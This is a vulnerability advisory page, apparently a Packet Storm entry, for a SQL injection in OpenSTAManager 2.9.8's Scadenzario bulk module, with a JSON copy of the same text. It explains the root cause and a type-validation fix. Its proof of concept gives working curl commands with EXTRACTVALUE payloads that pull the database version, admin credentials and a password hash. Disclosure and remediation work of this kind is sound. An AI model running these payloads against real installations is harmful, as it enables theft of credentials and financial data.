📄 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741

8.7 / 10

HIGH

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

Description

OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module...

Visit Original Source

Basic Information

ID PACKETSTORM:218741

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions # CVE-2026-24418: OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2026-24418](https://nvd.nist.gov/vuln/detail/CVE-2026-24418) |
| **Severity** | HIGH |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **devcode-it/openstamanager** (versions: <= 2.9.8)

## CWE Classification

- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

## Details

### Summary

Critical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.

**Status:** ✅ Confirmed and tested on live instance (v2.9.8)
**Vulnerable Parameter:** `id_records[]` (POST array)
**Affected Endpoint:** `/actions.php?id_module=18` (Scadenzario module)
**Attack Type:** Error-Based SQL Injection (IN clause)

### Details

OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the `id_records` array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.

**Vulnerability Chain:**

1. **Entry Point:** `/actions.php` (Lines 503-506)
```php
$id_records = post('id_records');
$id_records = is_array($id_records) ? $id_records : explode(';', $id_records);
$id_records = array_clean($id_records);
$id_records = array_unique($id_records);
```
The `array_clean()` function only removes empty values - it does NOT validate types.

2. **Vulnerable Function:** `/lib/util.php` (Lines 54-60)
```php
function array_clean($array)
{
if (!empty($array)) {
return array_unique(array_values(array_filter($array, fn ($value) => !empty($value))));
}
}
```
**Impact:** The function filters out empty values but accepts any non-empty value, including SQL injection payloads.

3. **SQL Injection Point:** `/modules/scadenzario/bulk.php` (Line 88) **PRIMARY VULNERABILITY**
```php
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```
**Impact:** Array elements from `$id_records` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL injection.

**Root Cause Analysis:**

The vulnerability exists because:
1. `post('id_records')` returns user-controlled array
2. `array_clean()` only removes empty values, not non-integer values
3. `implode(',', $id_records)` concatenates array elements directly into SQL
4. No validation ensures array elements are integers
5. Attacker can inject SQL by providing: `id_records[]=1&id_records[]=(MALICIOUS SQL)#`

**Affected Code Path:**
```
POST /actions.php?id_module=18
↓
actions.php:503 - $id_records = post('id_records')
↓
actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]
↓
actions.php:509 - include 'modules/scadenzario/bulk.php'
↓
bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]
```

### PoC

**Step 1: Login**
```bash
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
```

**Step 2: Verify Vulnerability (Error-Based SQL Injection)**

**Test 1: Extract Database User and Version**
```bash
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" \
"http://localhost:8081/actions.php?id_module=18"
```

**Response (error message visible to attacker):**
```html
<code>XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'</code>
```

**Test 2: Extract Admin Credentials**
```bash
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```

**Response:**
```html
<code>XPATH syntax error: '~admin:[email protected]'</code>
```

**Test 3: Extract Password Hash (Part 1 - first 31 chars)**
```bash
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```

**Response:**
```html
<code>XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'</code>
```

**Test 4: Extract Password Hash (Part 2 - chars 32-60)**
```bash
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```

**Response:**
```html
<code>XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'</code>
```

**Combined Password Hash:**
```
$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK
```

### Impact

**All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.

**Recommended Fix:**

**Primary Fix - Type Validation:**

File: `/modules/scadenzario/bulk.php`

**BEFORE (Vulnerable - Line 88):**
```php
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```

**AFTER (Fixed):**
```php
// Validate that all array elements are integers
$id_records = array_map('intval', $id_records);
$id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs

$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```

### Credits
Discovered by Łukasz Rybak

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq
- https://nvd.nist.gov/vuln/detail/CVE-2026-24418
- https://github.com/advisories/GHSA-4xwv-49c8-fvhq

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

{
    "lastseen": "2026-04-13T15:51:43",
    "description": "OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218741",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-24418"
    ],
    "sourceData": "# CVE-2026-24418: OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module\n    \n    ## Overview\n    \n    | Field | Details |\n    |---|---|\n    | **CVE ID** | [CVE-2026-24418](https://nvd.nist.gov/vuln/detail/CVE-2026-24418) |\n    | **Severity** | HIGH |\n    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq) |\n    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |\n    \n    ## Affected Products\n    \n    - **devcode-it/openstamanager** (versions: <= 2.9.8)\n    \n    \n    ## CWE Classification\n    \n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n    \n    ## Details\n    \n    ### Summary\n    \n    Critical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.\n    \n    **Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\n    **Vulnerable Parameter:** `id_records[]` (POST array)\n    **Affected Endpoint:** `/actions.php?id_module=18` (Scadenzario module)\n    **Attack Type:** Error-Based SQL Injection (IN clause)\n    \n    ### Details\n    \n    OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the `id_records` array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\n    \n    **Vulnerability Chain:**\n    \n    1. **Entry Point:** `/actions.php` (Lines 503-506)\n       ```php\n       $id_records = post('id_records');\n       $id_records = is_array($id_records) ? $id_records : explode(';', $id_records);\n       $id_records = array_clean($id_records);\n       $id_records = array_unique($id_records);\n       ```\n       The `array_clean()` function only removes empty values - it does NOT validate types.\n    \n    2. **Vulnerable Function:** `/lib/util.php` (Lines 54-60)\n       ```php\n       function array_clean($array)\n       {\n           if (!empty($array)) {\n               return array_unique(array_values(array_filter($array, fn ($value) => !empty($value))));\n           }\n       }\n       ```\n       **Impact:** The function filters out empty values but accepts any non-empty value, including SQL injection payloads.\n    \n    3. **SQL Injection Point:** `/modules/scadenzario/bulk.php` (Line 88) **PRIMARY VULNERABILITY**\n       ```php\n       $scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');\n       ```\n       **Impact:** Array elements from `$id_records` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL injection.\n    \n    **Root Cause Analysis:**\n    \n    The vulnerability exists because:\n    1. `post('id_records')` returns user-controlled array\n    2. `array_clean()` only removes empty values, not non-integer values\n    3. `implode(',', $id_records)` concatenates array elements directly into SQL\n    4. No validation ensures array elements are integers\n    5. Attacker can inject SQL by providing: `id_records[]=1&id_records[]=(MALICIOUS SQL)#`\n    \n    **Affected Code Path:**\n    ```\n    POST /actions.php?id_module=18\n      \u2193\n    actions.php:503 - $id_records = post('id_records')\n      \u2193\n    actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]\n      \u2193\n    actions.php:509 - include 'modules/scadenzario/bulk.php'\n      \u2193\n    bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]\n    ```\n    \n    ### PoC\n    \n    **Step 1: Login**\n    ```bash\n    curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \\\n      -d 'username=admin&password=admin'\n    ```\n    \n    **Step 2: Verify Vulnerability (Error-Based SQL Injection)**\n    \n    **Test 1: Extract Database User and Version**\n    ```bash\n    curl -b cookies.txt \\\n      -d \"op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23\" \\\n      \"http://localhost:8081/actions.php?id_module=18\"\n    ```\n    \n    **Response (error message visible to attacker):**\n    ```html\n    <code>XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'</code>\n    ```\n    \n    **Test 2: Extract Admin Credentials**\n    ```bash\n    curl -b cookies.txt \\\n      -d \"op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23\" \\\n      \"http://localhost:8081/actions.php?id_module=18\"\n    ```\n    \n    **Response:**\n    ```html\n    <code>XPATH syntax error: '~admin:[email protected]'</code>\n    ```\n    \n    **Test 3: Extract Password Hash (Part 1 - first 31 chars)**\n    ```bash\n    curl -b cookies.txt \\\n      -d \"op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23\" \\\n      \"http://localhost:8081/actions.php?id_module=18\"\n    ```\n    \n    **Response:**\n    ```html\n    <code>XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'</code>\n    ```\n    \n    **Test 4: Extract Password Hash (Part 2 - chars 32-60)**\n    ```bash\n    curl -b cookies.txt \\\n      -d \"op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23\" \\\n      \"http://localhost:8081/actions.php?id_module=18\"\n    ```\n    \n    **Response:**\n    ```html\n    <code>XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'</code>\n    ```\n    \n    **Combined Password Hash:**\n    ```\n    $2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK\n    ```\n    \n    \n    ### Impact\n    \n    **All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.\n    \n    **Recommended Fix:**\n    \n    **Primary Fix - Type Validation:**\n    \n    File: `/modules/scadenzario/bulk.php`\n    \n    **BEFORE (Vulnerable - Line 88):**\n    ```php\n    $scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');\n    ```\n    \n    **AFTER (Fixed):**\n    ```php\n    // Validate that all array elements are integers\n    $id_records = array_map('intval', $id_records);\n    $id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs\n    \n    $scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');\n    ```\n    \n    ### Credits\n    Discovered by \u0141ukasz Rybak\n    \n    ## References\n    \n    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-24418\n    - https://github.com/advisories/GHSA-4xwv-49c8-fvhq\n    \n    \n    ## Disclaimer\n    \n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.",
    "sourceHref": "https://packetstorm.news/download/218741",
    "cvss": {
        "score": 8.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218741/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply